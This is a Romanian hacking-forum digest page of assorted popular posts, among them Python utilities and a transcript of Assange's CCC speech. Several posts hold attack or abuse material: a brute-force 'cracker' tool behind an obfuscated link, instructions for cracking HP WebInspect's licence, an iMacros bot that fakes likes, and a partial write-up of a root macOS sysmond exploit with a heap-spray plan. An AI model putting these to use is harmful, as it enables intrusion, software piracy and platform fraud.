Leaderboard
Popular Content
Showing content with the highest reputation on 01/10/15 in all areas
-
Salut , sunt mai vechi pe rst si pana acum nu m-am prezentat , si am zis sa o faca si pe asta : Ma numesc Razvan , am 25 de ani si sunt iubitor de IT Sa trecem la cunostinte : C/C++,java,php,linux,mysql,js(stadiu de incepator) Cam asta sunt eu , sper sa ne intelegem O zi buna.12 points
-
Pana in prezent stie sa tipareasca: Nr. caractere in text: Nr. propozitii in text: Nr. cuvinte in text: Nr. randuri in text: MD5 text: Nr. caractere pe fiecare rand: Dec to str/reversed: Prima/ultima litera din fiecare rand/reversed: Primul/ultimul cuvant din fiecare rand/reversed: Prima/ultima litera din fiecare cuvant/reversed: Prima/ultima litera din fiecare propozitie/reversed: Primul/ultimul cuvant din fiecare propozitie/reversed: Fibonacci litere/cuvinte /reversed Nr prime litere/cuvinte /reversed Diagonala litere/cuvinte /reversed Step -custom /reversed Coloana -custom /reversed De exemplu, pentru challenge-ul realizat de @Gio33 : https://rstforums.com/forum/94853-decrypt-me-easy-mesaj-de-la-partener.rst Nr. caractere pe fiecare rand: 48 55 52 55 51 49 46 48 45 32 44 51 50 54 50 49 53 46 49 53 32 64 32 48 48 58 48 50 32 111 103 Dec to str/reversed: 074731.0- ,326215.15 @ 00:02 og go 20:00 @ 51.512623, -0.137470 Source code: text = """Textul in care este ascuns mesajul secret.""" print """ \t Cautatoru de mesaje ascunse in plain text \t Proprietate RSTforums.com \t Usr6, Sulea Este interzisa utilizarea acestui stript de catre: \t persoanele aflate in stare de ebrietate(poate duce la descoperirea comorii dacice) \t servicii speciale (ex:SRI, SIE, DIICOT, Patriarhie, STS, etc), firmele cu activitate in IT, etc. (fara suparare, dar va puteti permite sa cumparati un soft pro) \t fanii justin bieber Daca va incadrati in una din categoriile de mai sus si totusi doriti sa utilizati scriptul, trebuie sa cumparati o sharoma cu de toate unui om sarman inainte de fiecare utilizare """ import hashlib print "Nr. caractere in text: %d " %(len(text)) propozitii = text.split(".") print "Nr. propozitii in text: %d" %(len(propozitii)) cuvinte = text.split(" ") print "Nr. cuvinte in text: %d" %(len(cuvinte)) randuri = text.splitlines() print "Nr. randuri in text: %d" %(len(randuri)) m = hashlib.md5() m.update(text) print "MD5 text: %s" %(m.hexdigest()) a = b = c = d = e = f ="" for linie in randuri: a += chr(len(linie)) d += str(len(linie)) + " " b += linie[0] c += linie[-1] cuv = linie.split() e += cuv[0] + " " f += cuv[-1] + " " print "\nNr. caractere pe fiecare rand:\n%s" %(d) print "Dec to str/reversed:\n%s\n%s" %(a,a[::-1]) print "\nPrima litera din fiecare rand/reversed:\n%s\n%s" %(b, b[::-1]) print "Ultima litera din fiecare rand/reversed:\n%s\n%s" %(c, c[::-1]) print "\nPrimul cuvant din fiecare rand/reversed:\n%s\n%s" %(e, e[::-1]) print "Ultimul cuvant din fiecare rand/reversed:\n%s\n%s" %(f, f[::-1]) a = b = "" for cuvant in cuvinte: c = "" for litera in cuvant: if litera not in ['"', ".", ",", ";", "(", ")"]: c += litera if len© >0: a += c[0] b += c[-1] print "\nPrima litera din fiecare cuvant/reversed:\n%s\n%s" %(a, a[::-1]) print "Ultima litera din fiecare cuvant/reversed:\n%s\n%s" %(b, b[::-1]) a = b = d = e = "" for propozitie in propozitii: f = propozitie.split() if len(f) >0 : d += f[0] + " " e += f[-1] + " " c = "" for x in propozitie: if x not in [" ", '"', ".", ",", ";", "(", ")", "\n"]: c += x if len© >0: a += c[0] b += c[-1] print "\nPrima litera din fiecare propozitie/reversed:\n%s\n%s" %(a, a[::-1]) print "Ultima litera din fiecare propozitie/reversed:\n%s\n%s" %(b, b[::-1]) print "\nPrimul cuvant din fiecare propozitie/reversed:\n%s\n%s" %(d, d[::-1]) print "Ultimul cuvant din fiecare propozitie/reversed:\n%s\n%s" %(e, e[::-1]) prime = [2,3,5,7,11,13,17,19,23,29,31,37,41,43,47,53,59,61,67,71,73,79,83,89,97] fibo = [0,1,2,3,5,8,13,21,34,55,89,144,233,377,610] nc = len(cuvinte) nl = len(text) a = b = "" for c in prime: if c < nc: a += cuvinte[c] + " " if c < nl: b += text[c] print "\nNumere prime:" print "\tCuvinte /reversed:\n\t%s\n\t%s" % (a, a[::-1]) print "\tLitere /reversed:\n\t%s\n\t%s" % (b, b[::-1]) a = b = "" for c in fibo: if c < nc: a += cuvinte[c] + " " if c < nl: b += text[c] print "Fibonacci:" print "\tCuvinte /reversed:\n\t%s\n\t%s" % (a, a[::-1]) print "\tLitere /reversed:\n\t%s\n\t%s" % (b, b[::-1]) step = 2 a = b = "" for c in range(0, nc, step): a += cuvinte[c] for c in range(0, nl, step): b += text[c] print "\nStep: %d" %(step) print "Cuvinte / reversed:\n%s\n%s" %(a, a[::-1]) print "Litere / reversed:\n%s\n%s" %(b, b[::-1]) a = b = "" for c in range(0, len(randuri)): if c < len(randuri[c]): a += randuri[c][c] d = randuri[c].split() if c < len(d): b += d[c] + " " print "\nDiagonala :" print "Litere /reversed:\n\t%s\n\t%s" % (a, a[::-1]) print "Cuvinte /reversed:\n\t%s\n\t%s" % (b, b[::-1]) coloana = 5 a = "" for b in range(0, len(randuri)): if len(randuri) < coloana: a += " " else: a += randuri[coloana] print "\nColoana: %d" %(coloana) print "Litere /reversed:\n\t%s\n\t%s" % (a, a[::-1])7 points
-
Hai salut! A incercat/reusit cineva sa instaleze modemul de la Digi Net Mobil pe BackTrack 5?5 points
-
Salut baieti, Fiind pasionat de haine, moda, trend, stil ma tot gandesc sa imi deschid un blog in acest domeniu. As vrea sa vad si parearea voastra, ce parere aveti despre un asemenea blog ? As incerca sa creez un blog ce sa fie atat pentru femei cat si pentru barbati si mi-ar place sa merg mult pe inspiratie, pe multe poze, multe sfaturi dar in acelasi timp si diferite tutoriale. Ma gandeam ca blogul sa fie in limba engleza pentru a aduce cat mai multe vizite si sa il populez prin pagina de facebook, instagram, tumblr pentru inceput. Neavand la dispozitie un buget, deocamdata, eu tind sa cred ca e ok facebook,pinterest,tumblr pentru a popula blog-ul. Ce parere aveti, credeti ca ar fi o chestie de viitor ? As putea sa scot bani din acest blog dupa ce o sa incep sa investesc si eu in el ? Aveti anumtie idei sau ar vrea careva sa se implice prin diferite sfaturi ? As vrea sa stiu despre publicarea unor imagini de pe alte bloguri, daca e voie sau nu sa iau imagini de pe diferite blog-uri si sa postez sursa eventual ? Multumesc ! //Credeti ca ideea de a putea fi vizionat doar de membrii inregistrati ar fi una buna ?3 points
-
Lectures Introduction and Course Overview Analysis of Classical Algorithms Analysis of Some Sorting Algorithms Order of Growth Asymptotic Analysis: Part I Asymptotic Analysis: Part II Algorithmic Analysis Worst and Average Case Analysis Amortized Analysis Mathematical Preliminaries Summations Recurrence Relations Data Structures: Linked Lists and Graphs Data Structures: Trees Data Structures: Heaps Data Structures: Disjoint Sets and Union/Find Algorithms Data Structures: Complexity Analysis of Union/Find Algorithms Induction: General Introduction Induction: Integer Exponentiation and Polynomial Evaluation Induction: The Problem of Generating Permutations Induction: Finding the majority element Divide and Conquer: Introduction Divide and Conquer: Top-Down Merge Sort Divide and Conquer: The Selection Problem Divide and Conquer: QuickSort Divide and Conquer: Multiplication of Large Integers and Matrix Multiplication Divide and Conquer: Strassen's Algorithm Dynamic Programming: Introduction Dynamic Programming: The Longest Common Subsequence Problem Dynamic Programming: Matrix Chain Multiplication Dynamic Programming: All Pairs Shortest Path Problem and the Knapsack Problem The Greedy Approach: Introduction The Greedy Approach: Single Source Shortest Path Problem The Greedy Approach: Minimum Spanning Trees (Kruskal's Algorithm) The Greedy Approach: Minimum Spanning Trees (Prim's Algorithm) The Greedy Approach: File Compression Graph Traversal: Depth First Search Graph Traversal: Applications of Depth First Search Graph Traversal: Breadth First Search NP-Completeness: Part I NP-Completeness: Part II ICS-353 Online Course3 points
-
Care are un link cu variantele din 2014 la informatica? Am cautat pe google cateva pagini din rezultate si toate sunt cu subiectul dat. Eu le vreau pe toate 100, am anul asta bac si vreau sa le scot si sa ma pun pe treaba. Mersi. // Edit: Subiecte Bacalaureat Informatica3 points
-
1.Ia fiecare postare de pe prima pagina si da like la ultimele 3 postari ale autorului. (Fara follow- pt ca bubblews cateaodata iti interzice sa mai dai follow) par1 - Pastebin.com 2.Tot ca prima dar da si follow (daca ai dat odata follow nu mai da unfollow) par2 - Pastebin.com Aveti peste 2500 lini la fiecare pt ca nu merge sa repet niste pasi in imacros (doar daca folosesc js si eu nu stiu ). Dupa ce mai adauga astia inca 500k posturi va trebui sa modificati linia TAG POS=1 TYPE=A ATTR=HREF:*/news/6* EXTRACT=HREF cu TAG POS=1 TYPE=A ATTR=HREF:*/news/7* EXTRACT=HREF3 points
-
3 points
-
WikiLeaks founder Julian Assange addressed a major gathering of computer experts Monday at the Chaos Communication Congress in Hamburg, Germany, calling on them to join forces in resisting government intrusions on Internet freedom and privacy. We play highlights from Assange’s speech, as well as the one given by Sarah Harrison, the WikiLeaks member who accompanied Edward Snowden to Russia. We also hear from independent journalist and security expert Jacob Appelbaum, who reveals a spying tool used by the National Security Agency known as a "portable continuous wave generator." The remote-controlled device works in tandem with tiny electronic implants to bounce invisible waves of energy off keyboards and monitors to see what is being typed. It works even if the target computer is not connected to the Internet. TRANSCRIPT This is a rush transcript. Copy may not be in its final form. AMY GOODMAN: We turn now to the Chaos Communication Congress, or CCC, in Hamburg, Germany. One of the speakers at the conference was WikiLeaks’ Sarah Harrison, who accompanied Edward Snowden to Russia and spent four months with him. Harrison addressed the audience after receiving a long standing ovation. SARAH HARRISON: Together with the Center for Constitutional Rights, we filed a suit against the U.S. military, against the unprecedented secrecy applied to Chelsea Manning’s trial. Yet through these attacks, we have continued our publishing work. In April of this year, we launched the Public Library of US Diplomacy, the largest and most comprehensive searchable database of U.S. diplomatic cables in the world. This coincided with our release of 1.7 million U.S. cables from the Kissinger period. We launched our third Spy Files, 249 documents from 92 global intelligence contractors, exposing their technology, methods and contracts. We completed releasing the Global Intelligence Files, over five million emails from U.S. intelligence firm Stratfor, the revelations from which included documenting their spying on activists around the globe. We published the primary negotiating positions for 14 countries of the Trans-Pacific Partnership, a new international legal regime that would control 40 percent of the world’s GDP. As well as getting Snowden asylum, we set up Mr. Snowden’s defense fund, part of a broader endeavor, the Journalistic Source Protection Defence Fund, which aims to protect and fund sources in trouble. This will be an important fund for future sources, especially when we look at the U.S. crackdown on whistleblowers like Snowden and alleged WikiLeaks source Chelsea Manning, who was sentenced this year to 35 years in prison, and another alleged WikiLeaks source, Jeremy Hammond, who was sentenced to 10 years in prison this November. These men, Snowden, Manning and Hammond, are prime examples of a politicized youth who have grown up with a free Internet and want to keep it that way. It is this class of people that we are here to discuss this evening, the powers they and we all have and can have. AMY GOODMAN: WikiLeaks founder Julian Assange also addressed the Chaos Communication Congress via video. Speaking from the Ecuadorean embassy in London, Assange urged information technology specialists to join forces to resist government encroachments on Internet freedom. JULIAN ASSANGE: Those high-tech workers, we are a particular class, and it’s time that we recognized that we are a class and looked back in history and understood that the great gains in human rights and education and so on that were gained through powerful industrial work as we formed the backbone of the economy of the 20th century, I think we have that same ability, but even more so, because of the greater interconnection that exists now, economically and politically, which is all underpinned by system administrators. And we should understand that system administrators are not just those people who administer one unique system or another; they are the people who administer systems. And the system that exists globally now is created by the interconnection of many individual systems. And we are all, or many of us, are part of administering that system, and have extraordinary power, in a way that is really an order of magnitude different to the power industrial workers had back in the 20th century. And we can see that in the cases of the famous leaks that WikiLeaks has done or the recent Edward Snowden revelations, that it’s possible now for even a single system administrator to have a very significant change to the—or rather, apply a very significant constraint, a constructive constraint, to the behavior of these organizations, not merely wrecking or disabling them, not merely going out on strikes to change policy, but rather shifting information from an information apartheid system, which we’re developing, from those with extraordinary power and extraordinary information, into the knowledge commons, where it can be used to—not only as a disciplining force, but it can be used to construct and understand the new world that we’re entering into. Now, Hayden, the former director of the CIA and NSA, is terrified of this. In Cypherpunks, we called for this directly last year. But to give you an interesting quote from Hayden, possibly following up on those words of mine and others: "We need to recruit from Snowden’s generation," says Hayden. "We need to recruit from this group because they have the skills that we require. So the challenge is how to recruit this talent while also protecting ourselves from the small fraction of the population that has this romantic attachment to absolute transparency at all costs." And that’s us, right? So, what we need to do is spread that message and go into all those organizations—in fact, deal with them. I’m not saying don’t join the CIA. No, go and join the CIA. Go in there. Go into the ballpark and get the ball and bring it out—with the understanding, with the paranoia, that all those organizations will be infiltrated by this generation, by an ideology that is spread across the Internet. And every young person is educated on the Internet. There will be no person that has not been exposed to this ideology of transparency and understanding of wanting to keep the Internet, which we were born into, free. This is the last free generation. The coming together of the systems of governments, the new information apartheid across the world, the linking together, is such that none of us will be able to escape it in just a decade. Our identities will be coupled to it, the information sharing such that none of us will be able to escape it. We are all becoming part of the state, whether we like it or not, so our only hope is to determine what sort of state it is that we are going to become part of. And we can do that by looking and being inspired by some of the actions that produced human rights and free education and so on, by people recognizing that they were part of the state, recognizing their own power, and taking concrete and robust action to make sure they lived in the sort of society that they wanted to, and not in a hellhole dystopia. AMY GOODMAN: WikiLeaks founder Julian Assange addressing the Chaos Communication Congress that’s taking place in Hamburg, Germany. He, of course, was speaking from the Ecuadorean embassy in London. He fears if he steps foot outside that embassy, where he’s been for a year, that he will be arrested by British authorities, that he would be extradited to Sweden, and he most fears being extradited to the United States. Another key speaker Monday was independent journalist and security expert Jacob Appelbaum, who has been on Democracy Now! In this clip, he shows a slide with a futuristic-sounding device described as a portable continuous wave generator. It’s a remote-controlled device that works in tandem with tiny electronic implants to bounce invisible waves of energy off keyboards and monitors to see what’s being typed. It works even if the target device isn’t connected to the Internet. JACOB APPELBAUM: This is a continuous wave generator or continuous wave radar unit. You can detect its use because it’s used between one and two gigahertz, and its bandwidth is up to 45 megahertz, user-adjustable, two watts. Using an internal amplifier, external amplifier, makes it possible to go up to one kilowatt. I’m just going to let you take that in for a moment. Who’s crazy now? Now, I’m being told I only have one minute, so I’m going to have to go a little bit quicker. I’m sorry. Here’s why they do it. This is an implant called RAGEMASTER, part of the angry neighbor family of tools, where they have a small device that they put in line with a cable in your monitor, and then they use this radar system to bounce a signal—this is not unlike the Great Seal bug that [Léon] Theremin designed for the KGB—so it’s good to know we’ve finally caught up with the KGB—but now with computers. They send the microwave transmission, the continuous wave. It reflects off of this chip, and then they use this device to see your monitor. Yep. So there’s the full life cycle. First they radiate you, then you die from cancer, then you win? OK, so, here’s the same thing, but this time for keyboards, USB and PS/2 keyboards. So, the idea is that it’s a data retro-reflector. Here’s another thing, but this one, the TAWDRYYARD program, is a little bit different. It’s a beacon. So this is where, probably, then they kill you with a drone. That’s pretty scary stuff. They also have this for microphones to gather room bugs, for room audio. Notice the bottom. It says all components are common off the shelf and are so non-attributable to the NSA—unless you have this photograph and the product sheet. AMY GOODMAN: That was independent journalist and security expert Jacob Appelbaum speaking in Hamburg, Germany, at the Chaos Communication Congress. We will link to his full speech at democracynow.org. This is Democracy Now! And an update right now on the story in Egypt: One of the four Al Jazeera reporters has been released. Al Jazeera cameraman Mohamed Fawzy was released from detention. The three other journalists remain detained—correspondent Peter Greste and producers Mohamed Fahmy and Baher Mohamed. This is Democracy Now! When we come back, what’s some of the good news of 2013? Stay with us. Sursa: WikiLeaks’ Julian Assange Calls on Computer Hackers to Unite Against NSA Surveillance | Democracy Now!3 points
-
HSTS Super Cookies 2 January 2015 Websites could use a security feature of your iPad to track your browsing even if you clear the browser history. Demonstration Your tracking id was read. dbgies This is a unique value that was generated by JavaScript in this page. The page attempts to store this value in your web browser and read it again when you visit the page in the future. Different web browsers don't behave exactly the same way. To see how your browser performs try these tests and see if the value stays the same: Refresh the page. Open the same web address in a "private"/"incognito" window. Clear your browser cookies and refresh the page. Visit the page on a different iOS device, synced with the same iCloud account. If the value stays the same during any of these steps this technique could be used to track your browsing habits. It's a well observed tip to make sure you're using a secure connection whenever you visit a website where you might share sensitive or personal information. When you're visiting a website with a secure connection your web browser displays a padlock icon. The icon indicates that your connection to the site is encrypted and can't be interfered with or intercepted. A security feature of modern web browsers called "HTTP Strict Transport Security" (HSTS) allows a website to indicate that it should always be accessed using a secure connection. If you visit a site that has HSTS enabled, your web browser will remember this flag and ensure the connection is secure any time you visit the website in the future. Subsequent visits to the site without using a secure connection get automatically redirected by the web browser to the secure variant of the web address, beginning https:// This automatic redirecting protects your access to the site from being intercepted but could also be abused by a malicious site to store a unique number to track your web browser. A number can be encoded as a series of bits (true and false values) and stored by accessing a set of web addresses. Each web address responds with HSTS enabled or disabled depending on the address. Once the number is stored it could be read by other sites in the future. Reading the number just requires testing if requests for the same web addresses are redirected or not. Using HSTS to track your browsing habits evades the features of web browsers designed to control more normal "cookie" based tracking mechanisms. Using "incognito" or "private" modes means that existing cookies won't be shared with sites you visit. Browsers also let you entirely delete cookies that could be used to track you. Because HSTS is a security feature and isn't intended to be used for tracking, web browsers treat it differently from cookies. It is only by intentional misapplication that HSTS can be exploited to track users. Some browsers such as Google Chrome, Firefox and Opera do mitigate the issue. Erasing cookies on these browsers also erases HSTS flags so any stored value will be cleared. However, unlike cookies, existing HSTS flags are still shared with sites when using "incognito" or "private" windows. The impact is that it's possible for a site to track you even if you choose to use "incognito" or "private" browsing features in an effort to avoid such tracking. Considerably more worrying is the behavior displayed by Safari, the default browser for iPad and iPhone. When using Safari on an Apple device there appears to be no way that HSTS flags can be cleared by the user. HSTS flags are even synced with the iCloud service so they will be restored if the device is wiped. In this case the device can effectively be "branded" with an indelible tracking value that you have no way of removing. A notable exception is Internet Explorer which has no support for HSTS (although it is in development at the time of writing) so it's not vulnerable to this technique. I initially thought this wasn't an avenue that had previously been explored, However Mikhail Davidov wrote about the potential misuse of HSTS in April 2012 although I'm not aware of any direct response to his observations by browser vendors. I'm not aware of the technique being used to track users in the wild, although that is not to say it isn't. I'd like to reach out to the rest of the technical community to consider how this might be mitigated while still deriving as much value from HSTS as possible. If you would like to get in touch regarding this information please email me at sam-hsts-sc@radicalresearch.co.uk Update 4 January 2015 Members of he Google Chrome security team have been kind enough to highlight the discussions that have lead to a number of patches, and reverts to the chromium code base in attempts to mitigate the effects of the problem this article demonstrates. You can read more here and here Ultimately they conclude that there is a necessary trade-off between security and privacy. The chromium security FAQ goes on to say that "defeating such fingerprinting is likely not practical without fundamental changes to how the Web works". The Technical analysis of client identification mechanisms talks about the possibility of this technique, along with many others, saying "In an attempt to balance security and privacy, any HSTS pins set during normal browsing are carried over to the incognito mode in Chrome; there is no propagation in the opposite direction, however." Update 7 January 2015 The release of version 34.0 of Firefox seems to have changed. Unlike Google Chrome, Firefox has chosen to prefer privacy over security and no longer carries HSTS over to private windows. Robert "RSnake" Hansen points out that he raised concerns about this possibility on his blog ha.ckers.org when implementations of the HSTS were in their infancy. Sursa: RadicalResearch HSTS Super Cookies2 points
-
2 points
-
\_ ___ \ ____ _____ ______ __ ___/ |_ ___________ | |/ _|___________ ____ ___________ / \ \/ / _ \ / \\____ \| | \ __\/ __ \_ __ \ | < / _ \_ __ \/ \_/ __ \_ __ \ \ \___( <_> ) Y Y \ |_> > | /| | \ ___/| | \/ | | ( <_> ) | \/ | \ ___/| | \/ \______ /\____/|__|_| / __/|____/ |__| \___ >__| |____|__ \____/|__| |___| /\___ >__| \/ \/|__| \/ \/ \/ \/ Download link aHR0cCUzQS8vd3d3Lm1lZGlhZmlyZS5jb20vJTNGYXV4MGV1ZHg3aDZoNm1i Utilizare # set target IANA — Example domains # set uname admin # crack Daca aveti intrebari nu ezitati sa postati !2 points
-
The official website of the Nationalist Movement, a white supremacist organization based in Mississippi, was defaced by “Anonymous” hackers on Friday afternoon. The home page of the website, nationalist.org, was replaced with a message condemning facism and white power groups. The rest of the website appeared to be functioning normally. “Greetings, fellow Anons and Citizens of the world. It has come to our attention that Fascists and white power groups across the world are causing the spread of hate and ignorance,” the message read. “A spectre is haunting the Earth, the spectre of Facism [sic]. “For long, we have seen the damage caused by the ideology of white supremacy. We have seen, and participated in, many decades of resistance to white supremacy. We, and others, will never stop fighting fascism and racism wherever it rears its head.” The Nationalist Movement has held multiple marches on Martin Luther King Jr. Day throughout the years to protest the federal holiday honoring the slain civil rights leader. The group won a legal battle in 1992 when the Supreme Court ruled local governments could not impose fees to prevent them from holding demonstrations on public property. Source: ‘Anonymous’ hackers deface Mississippi-based white pride website with anti-fascist message | The Raw Story Indexul inca nu a fost restaurat: http://nationalist.org/2 points
-
Webinspect 10.20: download the application from official site itself. Nu l-am incercat, nu stiu daca e infectat, executati pe proprie raspundere. Download: https://download.hpsmartupdate.com/webinspect/ and crack here: Crack: hp webinspect crack.rar — RGhost — file sharing to crack copy WI8.exe and HPLicense.xml in installation folder double click WI8.exe first click on license and browse HPLicense.xml Then click on patch. Enjoy will be valid till 2020. Sursa: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post1771381 point
-
"Cautatoru de chilipiruri" tine evidenta preturilor scazute de pe Produse Resigilate Pret asc - eMAG.ro si in cazul in care apare vreun produs sub pretul specificat de tine in setari (Default: 25 RON), iti va trimite un email pentru a te atentiona de aparitia acelui produs: Scriptul a fost testat folosind serverul smtp oferit de inbox.com (moka), default cauta din 10 in 10 minute #!/usr/bin/env python import smtplib import urllib2 import random import re import time #panou de configurare email = "" #unde vrei sa primesti ofertele smtp = "my.inbox.com" loginuser = "@inbox.com" loginpass = "" chilipir = 25 #pretul(ron) sub care sunteti anuntat interval_timp_cautare = 600 # in secunde print r""" #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#\ #.........RSTforums.com........#-\ #.............Usr6.............#--\/ #...Cautatoru de chilipiruri...#--/\ #..............................#-/ #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#/ """ def email_sender(TEXT): #print TEXT message = 'To:' + email + '\n' + 'From: ' + loginuser + '\n' + 'Subject:Chilipir \n\n' + TEXT server = smtplib.SMTP(smtp, 587) server.login(loginuser, loginpass ) server.sendmail(loginuser, email, message) server.quit() print "Oferta a fost expediata" return expediate = [] while True : expediat = "" random_nr = str(random.randint(10**16,99999999999999999)) ua = "Opera/%s.%s (Windows NT %s.%s) Presto/%s.%s.%s Version/%s.%s" \ %(random_nr[0], random_nr[1:3], random_nr[4], random_nr[5], random_nr[6], random_nr[7:9], random_nr[10:13], random_nr[13:15], random_nr[15:17]) try: site = "http://www.emag.ro/resigilate/sort-priceasc" req = urllib2.Request(site, None, {'User-Agent' : ua}) continut = urllib2.urlopen(req, timeout=30).read() match = re.findall('\"money-int\"\>(\d*)\<\/span\>\<sup class=\"money-decimal\"\>\d*.+\n.+\t+.+\n\t.+\n.+\n.+\<a href=\"(.+#resigilate)"',continut) for every in match: pret, link = every if int(pret) <= chilipir: link = "http://www.emag.ro" + link unic = str(pret) + link if unic not in expediate: expediat += str(pret) + "\t" + link +"\n" expediate.append(unic) except Exception as E: email_sender(str(E)) if len(expediat) >= 1: email_sender(expediat) time.sleep(interval_timp_cautare) print time.strftime("%c"), "nimic nou" exit()1 point
-
Salutare, pentru cei care sunteti faliliarizati cu youtube si adsense, se poate sa imi explicati de ce ii diferenta asa mare intre venituri? Img:1 point
-
1 point
-
Reported by ianb.. @google.com, Oct 7, 2014 tested on OS X 10.9.5 - uses some hard-coded offsets which will have to be fixed-up for other versions! this poc uses liblorgnette to resolve some private symbols; grab the code from github: git clone https://github.com/rodionovd/liblorgnette.git build this PoC with: clang -o sysmond_exploit_writeup sysmond_exploit_writeup.c liblorgnette/lorgnette.c -framework CoreFoundation sysmond is a daemon running as root. You can interact with sysmond via XPC ("com.apple.sysmond".) sub_100001AAF calls sub_100003120 passing the xpc dictionary received from the attacker. This function allocates a sysmond_request object and fills in fields from the attacker-controlled xpc request dictionary: ;read a uint64 with the key "Type" __text:0000000100003144 mov rax, cs:_SYSMON_XPC_KEY_TYPE_ptr __text:000000010000314B mov rsi, [rax] __text:000000010000314E mov rdi, r14 __text:0000000100003151 call _xpc_dictionary_get_uint64 __text:0000000100003156 mov [rbx+20h], rax ;rbx points to sysmond_request ;read anything with the key "Attributes" __text:000000010000315A mov rax, cs:_SYSMON_XPC_KEY_ATTRIBUTES_ptr __text:0000000100003161 mov rsi, [rax] __text:0000000100003164 mov rdi, r14 __text:0000000100003167 call _xpc_dictionary_get_value __text:000000010000316C mov [rbx+28h], rax ... continues parsing more fields The sysmond_request is returned from this function and passed as the first argument to sub_10000337D: __text:000000010000337D sub_10000337D proc near ; CODE XREF: sub_100001AAF+4Bp __text:000000010000337D __text:000000010000337D var_38 = qword ptr -38h __text:000000010000337D var_30 = dword ptr -30h __text:000000010000337D var_2C = dword ptr -2Ch __text:000000010000337D var_28 = qword ptr -28h __text:000000010000337D var_20 = qword ptr -20h __text:000000010000337D var_18 = qword ptr -18h __text:000000010000337D __text:000000010000337D push rbp __text:000000010000337E mov rbp, rsp __text:0000000100003381 push r14 __text:0000000100003383 push rbx __text:0000000100003384 sub rsp, 30h __text:0000000100003388 mov rbx, rdi ; sysmond_request pointer __text:000000010000338B mov rdi, [rbx+20h] ; "Type" uint64 value in the xpc request dictionary __text:000000010000338F mov rsi, [rbx+28h] ; "Attributes" value in the xpc request dictionary __text:0000000100003393 call sub_100003454 this function extracts the Type and Attribute values and passes them to sub_100003454: __text:0000000100003454 sub_100003454 proc near ; CODE XREF: sub_10000337D+16p __text:0000000100003454 ; handler+C0 p __text:0000000100003454 push rbp __text:0000000100003455 mov rbp, rsp __text:0000000100003458 push r15 __text:000000010000345A push r14 __text:000000010000345C push r12 __text:000000010000345E push rbx __text:000000010000345F mov r12, rsi ; this is "Attributes" value __text:0000000100003462 mov r14, rdi ; which was read from the dictionary with xpc_dictionary_get_value __text:0000000100003465 mov rdi, r12 ; meaning it could be any xpc type __text:0000000100003468 call _xpc_data_get_length ; use "Attributes" value as an xpc_data object __text:000000010000346D mov r15, rax __text:0000000100003470 mov rdi, r15 ; size_t __text:0000000100003473 call _malloc __text:0000000100003478 mov rbx, rax __text:000000010000347B mov rdi, r12 __text:000000010000347E mov rsi, rbx __text:0000000100003481 xor edx, edx __text:0000000100003483 mov rcx, r15 __text:0000000100003486 call _xpc_data_get_bytes ; use "Attributes" value again interpreted as an xpc_data the xpc_data_get_bytes call is the interesting one: __text:00000000000114BE _xpc_data_get_bytes proc near __text:00000000000114BE push rbp __text:00000000000114BF mov rbp, rsp ... __text:00000000000114D2 mov r14, rsi __text:00000000000114D5 mov r13, rdi __text:00000000000114D8 cmp qword ptr [r13+28h], 0FFFFFFFFFFFFFFFFh __text:00000000000114DD jnz short loc_11515 ... __text:0000000000011515 lea rdi, [r13+28h] ; predicate __text:0000000000011519 lea rdx, __xpc_data_map_once ; function __text:0000000000011520 mov rsi, r13 ; context __text:0000000000011523 call _dispatch_once_f here, if the value at +28h isn't -1 then our xpc object will be passed as the context to __xpc_data_map_once: __text:00000000000028E9 __xpc_data_map_once proc near ; DATA XREF: _xpc_data_get_bytes_ptr+1Fo __text:00000000000028E9 ; __xpc_data_equal+46ao ... __text:00000000000028E9 push rbp __text:00000000000028EA mov rbp, rsp __text:00000000000028ED push r14 __text:00000000000028EF push rbx __text:00000000000028F0 mov rbx, rdi ; controlled xpc object __text:00000000000028F3 cmp byte ptr [rbx+48h], 0 ; if the byte at +48h is 0 __text:00000000000028F7 jnz short loc_291E __text:00000000000028F9 mov rdi, [rbx+30h] ; then pass the pointer at +30h __text:00000000000028FD lea rsi, [rbx+38h] __text:0000000000002901 lea rdx, [rbx+40h] __text:0000000000002905 call _dispatch_data_create_map ; to dispatch_data_create_map __text:000000000000290A mov r14, rax __text:000000000000290D mov rdi, [rbx+30h] ; object __text:0000000000002911 call _dispatch_release ; and then to dispatch_release we can return early from dispatch_data_create_map by setting the value at +28h from the pointer passed as the first arg to 0: __text:00000000000012B6 _dispatch_data_create_map proc near ; CODE XREF: __dispatch_data_subrange_map+34p __text:00000000000012B6 ; __dispatch_operation_perform+DEap __text:00000000000012B6 __text:00000000000012B6 push rbp __text:00000000000012B7 mov rbp, rsp __text:00000000000012BA push r15 __text:00000000000012BC push r14 __text:00000000000012BE push r13 __text:00000000000012C0 push r12 __text:00000000000012C2 push rbx __text:00000000000012C3 sub rsp, 38h __text:00000000000012C7 mov [rbp+var_58], rdx __text:00000000000012CB mov r15, rsi __text:00000000000012CE mov r14, rdi __text:00000000000012D1 mov r12, [r14+28h] ; if this is 0 __text:00000000000012D5 test r12, r12 __text:00000000000012D8 jz short loc_131C ; jumps to early return without disturbing anything else we then reach the call to dispatch_release which is passing the pointer at +30h of the xpc object we control (the API believes this is an xpc_data object) this ends up calling _dispatch_objc_release which sends the objective c "release" message to the object. We'll come back to how to get code code execution from that later. The crux of the bug is that the value of the "Attributes" key in the request dictionary is never validated to actually be an xpc_data object and the gets passed to functions expecting an xpc_data. In order to exploit this we need to have a value of a type other than xpc_data as the "Attributes" value in the request dictionary - specifically one where the offsets outlined above have suitably controlled values: +28h qword 0 +30h pointer to controlled data +48h byte 0 the xpc_uuid type comes the closest to fulfilling these requirements. We completely control the 16 bytes from +28h so the first two constraints are easily satisfied. Heap spraying is very reliable and fast in xpc, we can easily map a gigabyte of data into sysmond at a predicable address so we can point the pointer at +30h to that. The xpc_uuid object is only 40h bytes though, so we have no control over the byte at +48h which must be 0... OS X uses magazine malloc which is a heap-based allocator. It has three broad size classes (x<1k = tiny; 1k<x<15k = small; x>15k = large) and within these it will allocate approximately contiguously (using size-based free-lists to speed things up) with no inline-metadata which means there's a reasonable expectation that sequential allocations of similar sizes will be contiguous. Our xpc_uuid object is allocated when the request dictionary is received, so what's the next thing which is allocated? xpc_dictionaries have 6 hash buckets which store the heads of linked-lists for each bucket. As the dictionary is being deserialized first the value of a key is deserialized (allocating in this case the xpc_uuid) object then the entry is added to the linked-list (allocting a new linked-list entry struct.) The structure of a linked-list entry is 